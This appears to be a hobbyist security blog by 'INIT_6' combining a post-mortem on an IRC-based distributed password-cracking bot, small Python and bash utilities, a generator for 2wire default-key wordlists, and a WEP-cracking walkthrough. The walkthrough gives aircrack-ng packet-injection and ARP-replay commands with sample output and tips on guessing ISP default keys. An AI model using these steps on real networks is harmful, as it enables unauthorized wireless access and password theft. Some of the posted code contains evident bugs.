INIT_6

About 5 months ago I got the idea to create a botnet style password cracking program. This blog post is about what I was trying to do and how I failed. Along with version 2 outline showing whats next.

It took a little over 2 months to get people at DC214 (DEFCON Group in Dallas, TX) moving on the project. Mostly because this is the first project I have tried to lead. So that left us with about 3 months to complete the project. Another limitation I had I didn't know how to distribute the coding to other people. So I programmed everything my self. Working a normal job 7am to 5pm only had a couple hours a day. with about 3 weeks wasted on how to preform asynchronous subprocess communication with out blocking named pipes.

We ended up naming it: ID-PCB ( IRC distributed password cracking bot )

I have added the license GPLv3 and made the repo public. You can access the files here: https://github.com/DC214/pwcrack

What resources we had:

16x GPU's all but 2 were 7950's or 7970's

I know several people didn't even connect because we were having problems. I am thinking we had another 5 or 7 GPU's.

Roughly 140 CPU cores. plus 3 boxes with 12 CPUs each that didn't make it online.

How it was spouse to work:

The user would download the client software for pwcrack.init6.me. Run the setup.py. This would create a sysinfo file with all the hardware information. Also, the client ID represented the power of the computer. So the better the GPU and the more you had your client ID would be higher.

Then you would run the client software. It would read in the sysinfo file. Connect to the IRC server. Register with the server with all its info. It would than wait for commands to execute. Before executing any commands it would make sure the binary file was on the whitelist of apps. It would also do a md5sum on the binary and compare it with the read-only file on pwcrack.init6.me to make sure no "DEFCON hackers" messed with our stuff.

I had a regServer that kept track of all the clients and their status.
I had what I called crack programs that would query regServer database and grab clients to use and distribute the commands to each client.

Once the client executed the command it would hit the status key and send a update through IRC. Once it finished if passwords were found it would upload them to the FTP site and tell the crack program it was ready in which it would send the next command.

The problems:

I had only wrote and tested the brute force crack program. I wrote the Rule based crack program on the road while driving towards vegas.

Once I started a bruteforce command I had no way of stopping it nicely.

Didn't get to this point but all the clients would have stopped at the wrong time. I put a time bomb in it as on Saturday night it would have stopped whatever it was doing and upload what it had. However, it was checking local time not PDT.

IRC, IRC, IRC. It sounded great to start with because that's what I knew. I had programmed other IRC bots in the past. The IRC server had buffer problems both sending and receiving. During testing it didn't lag because I only had a couple clients on at once. However, once everyone jumped on and started talking the lag became really high.

Not enough testing.

No nvidia cards to test so some nvidia users couldn't connect correctly.


The conclusion:

It failed and that is okay. I learned a lot. This is the first python program I have wrote that was this complex.

I know why and how I failed so I have quickly moved on and designed a new approach.

A rough draft of the direction I would like to move this project in: [gdoc]

Made a python script to search twitter based on keywords, hashtags, from:user, and to:user.  It then creates a unique word list based on these searches. Used as a fingerprint attack.

https://github.com/initiate6/twatScrape.py

I decided it would be a good idea to start a GitHub to hold all my scripts.

https://github.com/initiate6

When hacking android apps I learned today that you can convert a IP address into a 10digit decimal number. This number is still valid in any web browser. I wrote two python programs to go both ways ;)

Used http://www.iowight.com/iwindex/decimal.php3 for the math.

From 10digit decimal to ip address:

#convert 10digit decimal formated ipaddress to normal ipaddress
#by init6
#blog.init6.me

import sys

def main():
    #read file and convert each line to ip address. Comment out to ask for input.
    with open('c:\ipaddress.txt', 'r') as infile:
        for line in infile:
            print (convert(int(line)))
    infile.close()

    #ask for input (dec format) Uncomment to ask for input.
    #decIn = input("Enter 10 digit decimal formated ipaddress: ")
    
def convert(decIn):

    if is32(decIn) == True:
        #convert dec to hex
        fullHex = hex(decIn).lstrip("0x")

        #Split hex number into four pairs
        hex1 = fullHex[0:2]
        hex2 = fullHex[2:4]
        hex3 = fullHex[4:6]
        hex4 = fullHex[6:8]
        #Convert each hex to decimal then to a string and return ip address.
        ipAddr = ( str(int(hex1,16)) + '.' + str(int(hex2,16)) + '.' + str(int(hex3,16)) + '.' + str(int(hex4,16)) )
        return ipAddr
    
#Checks to see if input is a 32bit int or less to make sure its a vaild ip address.         
def is32(n):
    try:
        bitstring=bin(n)
    except (TypeError, ValuueError):
        return False

    if len(bin(n)[2:]) <= 32:
        return True
    else:
        print ("Not a vaild 32bit 10 digit decimal")
        return False
    
main()

From IP Address to 10 digit decimal.

cmyip.com changed the way they encoded the numbers so I could no longer pull the ip address directly from the source code. Instead of trying to decode the htmlnumbers to ascii not only because its hard but they have it setup to change the encoding. So now, Grab the source code and feed it through w3m browser and dump it back out to the terminal then grep the IP Address.

http://pastie.org/5454850

#!/bin/bash
ip_addr=`curl -s http://cmyip.com | w3m -T text/html -dump | grep -o -E '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}'`
echo $ip_addr

My previous post had a few problems with the script. Then I had updated the script to work properly. http://pastie.org/5101804  However, it was still way to slow. Asked around and found the following solution.  

http://pastie.org/5104479

#Python 3
#Name: 2wire.py
#by: INIT_6
#Count from 0000000000 - 9999999999 skipping any numbers that repeat them selfs more then 3 times like 333

import sys
from threading import Thread

def count1(first, ver):
    MAX_INT = 999000000
    BAD_PATTERNS = {x * 3 for x in '0123456789'}
    # Use xrange for Python 2.7
    for number in range(MAX_INT):
        int_string = str(number).rjust(9, '0')
        if any(pattern in int_string for pattern in BAD_PATTERNS):
            continue
        print ( str(first) + str(number).rjust(9, '0') )

if __name__ == '__main__':
    for x in '0123456789':
        try:
            Thread(target=count1, args=(x,1)).start()
    
        except: # Exception, errtxt:
           print ( errtxt )

Still have some work. I need to test the threading better and set up a queue so it will only start as many threads as the computer can handle.

There are 100's if not 1000's of guides out there on how to crack WEP. This will mostly be a quick and dirty reference guide for a few friends trying to crack WEP them self's.

Aircrack-ng's guide to cracking WEP

Download and boot off of backtrack 5 r3 To install it on a flash drive use linux/windows tool YUMI

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0 
#airodump-ng --encrypt wep mon0

You should see several AP. Record the BSSID, ESSID, and Channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple targets on the same channel. You need to close airodump and stop airmon

#airmon-zc stop mon0 

Start airmon-zc on the channel of the target. (with WEP its not as necessary to lock the channel in on the driver as you have to with WPA)

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wep --ivs --write <FILENAME> --output-format pcap -a --channel <Channel number>

Now you need to inject packets. This will send packets to the access point as the other associated client generating your golden IVS you need to crack the WEP. 

#aireplay-ng mon0 -1 0 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 

If the above isn't generating any IVs you might need to tweak your command line. 

#aireplay-ng mon0 -1 <a number between 30-6000> -o <a number between 1-30> -q 10 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 




18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.

8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request


You can also do a ARP request replay attack. Either at the same time or in lieu of the above attack. 

#aireplay-ng mon0 -3 -b <MAC address of Access point> -h <MAC address of associated client>



 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


Now to crack the IV's you have obtain. There are a lot of different options at this point. For example. AT&T U-verse default wep is only numbers. Verizon FIOS wep is 0-9A-F. Doing home work on the default SSID might lead to a quicker crack.

Static WEP cracking options:

-c     Search alpha-numeric characters only.

-t      Search binary coded decimal characters only.

-n <nbits>

Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc., until 512 bits of length. The default value is 128.

-f <fudge>

By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.

-k <korek>

There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.

#aircrack-ng <any static WEP cracking options above> <filename>.cap

It will ask you to select your network you want to crack and show how many IV's it currently has. 

I only use the -f 1 option to get keys that are to easy and are thought to be false positives i.e. 123456789 or 111111111 

and remember a few quick google searches on the SSID (if its a default SSID) can save you a lot of time. 

Side note: if you run:

#iwconfig wlan0

And your power isn't set correctly to your gear you can change this by.

#iwconfig wlan0 twpower <dbi>


This is not a complete guide of everything you can do. Its just what I do and have a high success rate. if you have any questions feel free to drop me a e-mail/Gtalk at init6@init6.me